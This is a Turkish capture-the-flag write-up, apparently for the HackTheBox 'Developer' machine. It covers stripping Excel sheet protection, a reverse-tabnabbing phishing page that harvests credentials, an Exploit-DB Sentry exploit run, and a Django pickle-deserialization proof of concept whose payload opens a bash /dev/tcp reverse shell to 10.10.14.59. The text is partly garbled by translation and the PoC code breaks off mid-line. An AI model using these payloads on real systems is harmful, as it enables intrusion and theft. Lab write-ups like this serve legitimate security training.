Giriş noktası
Dosyayı açtıktan sonra gizli E sütununu görüyoruz. Belge şifreyle değiştirilmeye karşı korunduğu için sütunları genişletmek mümkün değil
dir.

Bu tür korumayı atlamak basittir. Arşiv olarak açın ve içinde istediğiniz sayfanın ayarlarını bulun. Bizim durumumuzda yalnızca bir tane olduğundan,

sayfa1 dosyasına ihtiyacımız var . xml

Bu dosyada şu satırı bulup siliyoruz ( sheetProtection field ):

<sheetProtection algorithmName="SHA-512" hashValue="Y4Ko7kZUKStIxaVGWEtuMeRdnCiN7O3D8qZtKdo/2jP7WE6yzKQXUcSWQ/E0OrqHCzhOBFX+t8Db5Pxaiu+N1g==" saltValue="EoiHQklf0FagPs+iW0OzkA==" spinCount="100000" sheet="1" objects="1" scenarios="1"/>

Sayfa Koruma alanı

Dosyayı kaydedin ve belgeyi açın. Şimdi koruma yok. E sütununu genişletiyoruz ve sitenin bayrağını buluyoruz.

Geriye kalan tek şey web sitesindeki forma girmek.

Artık sayfayı güncelledikten sonra görünüm biraz değişti; yanıt gönderme düğmesi yerine çözüm gönderme düğmesi ortaya çıktı.

Ve bir dosya indirerek değil, sayfa URL'sini belirterek.

Yerel Python 3 web sunucusunu açın (

python3  - m http .server 80 komutu

) ve bağlantıyı gönderin:

http://10.10.14.59/writeup.html

Web sunucusu günlüklerinde belirtilen sayfaya bir istek buluyoruz. Burası test edilecek yer!

Ayrıca çözüm profil sayfasında görüntülenir.
Ancak görüntülemeye çalışırsanız yeni bir sekmede açılacaktır. Sayfanın kaynak kodunda,

<a> etiketinde target = "_blank" niteliğini buluyoruz

target = "_blank" özelliğine sahip <a> etiketinin href argümanı kontrolümüz

altında olduğunda ve hedef kullanıcı bağlantıyı takip edebildiğinde, orada bir phishing sitesi belirtme şansı vardır .

Kullanıcı, window

nesnesini kullanarak bağlantıyı tıkladığında . açıcıyı, yasal yetkilendirme sayfasının bir kopyasını içerecek olan kötü amaçlı kaynağımıza yönlendiririz. Bu, kullanıcıyı kimlik bilgilerini girmeye zorlamalıdır. Bu kimlik avı tekniğine Sekme Nabbing adı veriliyor.

Web sunucusu dizininde bir yazma dosyası oluşturalım . Aşağıdaki içeriğe sahip html .

<html>
<script>
if (window.opener) window.opener.parent.location.replace('http://10.10.14.59/login.html');
if (window.parent != window) window.parent.location.replace('http://10.10.14.59/login.html');
</script>
</html>

Bu kod giriş sayfasını açmalıdır . html sunucumuzda. Şimdi sitedeki giriş sayfasını kopyalıyoruz. Bunu yapmak için, Firefox tarayıcısı için sayfanın tamamını tek bir

HTML

dosyasına kaydetmenize olanak tanıyan SingleFile uzantısını kullanıyorum.

Dosyayı giriş olarak kaydedelim .

html'yi açın ve kodunu biraz değiştirin. action = "auth.php"  ve method = "get"

niteliklerini belirtin .

Şimdi görev çözümünü tekrar gönderelim ve web sunucusu günlüklerinde onun isteğini göreceğiz, ardından oturum açmaya yönlendireceğiz . html ve kimlik bilgilerini auth'a gönderme .

php.ini

Bu kimlik bilgileri Django yönetici alanında oturum açmanıza olanak tanır

Dayanak noktası
Tüm yararlı bilgileri elde etmek için bölümleri gözden geçirelim. Burada kullanıcıların ve sitelerin bir listesini alabiliriz.

Yeni bir alan adı aldığımız için onu hemen /

etc / hosts dizinine

ekleyeceğiz . Artık girdimiz şöyle görünecek:

10.10.11.103    developer.htb developer-sentry.developer.htb

Ve Sentry web sitesinde bir yetkilendirme formuyla karşılaşacağız

Bir hizmet için yönetici şifremiz var; bu şifrenin burada da işe yarama ihtimali yüksek. Tek soru kullanıcı adıdır. Yönetici girişinin hatalı olduğu ortaya çıktı; admin @ geliştirici e-postasının tamamını girerseniz . htb veya admin @ geliştirici . ctf , ayrıca hiçbir şey alamıyoruz. Ama yöneticinin adı James. James @ geliştirici e-postasını deneyelim . htb ve siteye erişim sağlayın.

Aşağıda Sentry sürüm numarasını görüyoruz - 8.0.0. Bu en yenisi değil, bu yüzden açıkları aramaya değer . Böylece Google bizi Exploit-DB'ye, daha doğrusu 8.2.0 sürümünün istismarına yönlendiriyor .

İstismar işe yarıyor ama hiçbir şey vermiyor.

python3 50318.py --url 'http://developer-sentry.developer.htb' -U '[email protected]' -P 'SuperSecurePassword@HTB2021' -l 10.10.14.59 -p 4321

Bu yüzden manuel olarak deneriz.

Sentry, Python verilerini serileştirmek ve seri durumdan çıkarmak için gerekli olan turşu modülünü kullanır. Bu, kodun çalıştırılmasına yardımcı olabilir, ancak önce Django gizli anahtarına ihtiyacımız var.

Bir proje oluşturup silerek elde edilebilir: Proje Oluştur → Proje Ekle → Projeyi Kaydet → Proje Ayarı → Projeyi Kaldır.
Gizli anahtar göz önüne alındığında, ihtiyacımız olan kodu çalıştıracak bir nesneyi oluşturmak ve serileştirmek için aşağıdaki PoC'yi kullanabiliriz. İçinde değiştirmeniz gereken tek şey SECRET_KEY ve çerez değerleridir . Yük olarak ters kabuk kullanıyoruz:

/bin/bash -c "bash -i >& /dev/tcp/10.10.14.59/4321 0>&1"

[IMG]https://resmim.net/cdn/2024/09/15/m8QWjW.png[/IMG]

#!/usr/bin/python
import django.core.signing, django.contrib.sessions.serializers
from django.http import HttpResponse
import cPickle
import os
SECRET_KEY='c7f3a64aa184b7cbb1a7cbe9cd544913'
cookie='.eJxrYKotZNQI5UxMLsksS80vSi9kimBjYGAoTs0rKaosZA5lKS5NyY_gAQoZRBnmmGUlBbq7FhVFcAEFSlKLS5Lz87MzU8FayvOLslNTQoXiE0tLMuJLi1OL4pMSk7NT81JClSDG6ZWWZOYU64Hk9VxzEzNzHIEsJ6gaXiR9mSnerKV6AOVwM6Y:1n8lto:4YBeYgMOt1ujubTsANFkmRr3fw4'
newContent =  django.core.signing.loads(cookie,key=SECRET_KEY,serializer=django.contrib.sessions.serializers.PickleSerializer,salt='django.contrib.sessions.backends.signed_cookies')
class PickleRce(object):
   def __reduce__(self):
       return (os.system,('/bin/bash -c "bash -i >& /dev/tcp/10.10.14.59/4321 0>&1"',))
newContent['testcookie'] = PickleRce()
print django.core.signing.dumps(

Kapanış
Dostlar Ayrıcalık yüksekltme sonraki konu olsun çok yoruldum Kusura bakmayın

Devamını bekliyoruz legandry